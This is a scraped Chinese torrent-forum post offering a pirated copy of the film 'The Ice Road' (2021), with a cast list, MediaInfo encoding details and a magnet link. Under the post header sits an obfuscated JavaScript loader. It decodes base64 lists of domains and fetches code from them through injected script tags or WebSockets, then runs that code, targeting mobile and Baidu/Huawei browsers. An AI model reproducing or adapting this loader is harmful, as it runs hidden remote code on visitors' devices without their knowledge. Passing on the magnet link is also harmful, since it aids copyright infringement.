冰路营救[中文字幕].The.Ice.Road.2021.1080p.NF.迅雷下载 2.96GB

版主小s 1月前 288

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

image.png

◎译 名 冰路营救 / 极地冰劫(港) / 疾冻救援(台) / Red Ice

◎片 名 The Ice Road

◎年 代 2021

◎产 地 美国

◎类 别 动作 / 惊悚 / 冒险 / 灾难

◎语 言 英语

◎上映日期 2021-06-25(美国)

◎IMDb链接 https://www.imdb.com/title/tt3758814/

◎豆瓣评分 6.4/10 (1520人评价)

◎豆瓣链接 https://movie.douban.com/subject/34802334/

◎片 长 103分钟

◎导 演 乔纳森·汉斯雷 Jonathan Hensleigh (id:1286460)

◎编 剧 乔纳森·汉斯雷 Jonathan Hensleigh (id:1286460)

◎演 员 连姆·尼森 Liam Neeson (id:1031220)

马库斯·托马斯 Marcus Thomas (id:1327390)

劳伦斯·菲什伯恩 Laurence Fishburne (id:1022596)

安伯·明迪桑德 Amber Midthunder (id:1337934)

本杰明·沃克 Benjamin Walker (id:1313507)

霍特·麦克卡兰尼 Holt McCallany (id:1118033)

马特·麦考伊 Matt McCoy (id:1048230)

马丁·桑斯梅耶 Martin Senmeier (id:1345862)

马特·塞林格 Matt Salinger (id:1004917)

查德·布鲁斯 Chad Bruce (id:1078633)

亚当·哈蒂格 Adam Hurtig (id:1396164)

布拉德利·索茨基 Bradley Sawatzky (id:1174109)

马歇尔·威廉斯 Marshall Williams (id:1323867)

加布里埃尔·丹尼尔斯 Gabriel Daniels (id:1454973)

劳伦·科克伦 Lauren Cochrane (id:1454974)

阿尔·科利 Al Corley (id:1019224)

捷克琳·洛温 Jacqueline Loewen (id:1366298)

艾丽西亚·约翰斯顿 Alicia Johnston (id:1384992)

艾伦·默克 Aaron Merke (id:1388797)

达西·菲尔 Darcy Fehr (id:1166599)

洛丽·帕帕佐普洛斯 Lorrie Papadopoulos (id:1397334)

Bj·韦罗 Bj Verot (id:1397336)

◎标 签 动作 / 营救 / 灾难 / 美国 / 2021 / 连大爷拯救宇宙 / Liam·Neeson / 美国电影

◎简 介

在加拿大北部偏远地区的一个钻石矿倒塌后,冰路卡车司机(连姆·尼森饰)必须带领救援人员完成一项不可能的任务—穿越结冰的海面,营救被困矿工。除了融冰和风暴,还有难以预见的威胁在等着他们。

  1. General

  2. Unique ID : 61333067062628504459851399706891117884 (0x2E2451ACD91CF8DCBBB6D6011269E53C)

  3. Complete name : [email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 2.96 GiB

  7. Duration : 1 h 48 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 3 895 kb/s

  10. Encoded date : UTC 2021-06-27 16:04:04

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 3 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 3 frames

  21. Codec ID : V_MPEG4/ISO/AVC

  22. Duration : 1 h 48 min

  23. Bit rate mode : Variable

  24. Bit rate : 3 253 kb/s

  25. Nominal bit rate : 3 090 kb/s

  26. Maximum bit rate : 6 330 kb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 24.000 FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.065

  37. Stream size : 2.47 GiB (84%)

  38. Writing library : x264 core 148 r2722 1b0121b

  39. Encoding settings : cabac=1 / ref=3 / deblock=1:0:0 / analyse=0x1:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=24 / chroma_me=1 / trellis=2 / 8x8dct=0 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=2 / b_pyramid=0 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=24 / scenecut=0 / intra_refresh=0 / rc_lookahead=48 / rc=2pass / mbtree=1 / bitrate=3090 / ratetol=1.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / vbv_maxrate=6330 / vbv_bufsize=8440 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:1.00

  40. Default : Yes

  41. Forced : No


  42. Audio

  43. ID : 2

  44. Format : E-AC-3

  45. Format/Info : Enhanced AC-3

  46. Commercial name : Dolby Digital Plus

  47. Codec ID : A_EAC3

  48. Duration : 1 h 48 min

  49. Bit rate mode : Constant

  50. Bit rate : 640 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 31.250 FPS (1536 SPF)

  55. Compression mode : Lossy

  56. Stream size : 498 MiB (16%)

  57. Title : English

  58. Language : English

  59. Service kind : Complete Main

  60. Default : No

  61. Forced : No


  62. Text

  63. ID : 3

  64. Format : UTF-8

  65. Codec ID : S_TEXT/UTF8

  66. Codec ID/Info : UTF-8 Plain Text

  67. Duration : 1 h 47 min

  68. Bit rate : 64 b/s

  69. Count of elements : 1360

  70. Stream size : 50.7 KiB (0%)

  71. Title : English

  72. Language : English

  73. Default : No

  74. Forced : No


TAGS 动作 冒险 惊悚 灾难

磁力链:
  • magnet:?xt=urn:btih:C835DDEDBB7AE86B470102B8158873D8F861DE73
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回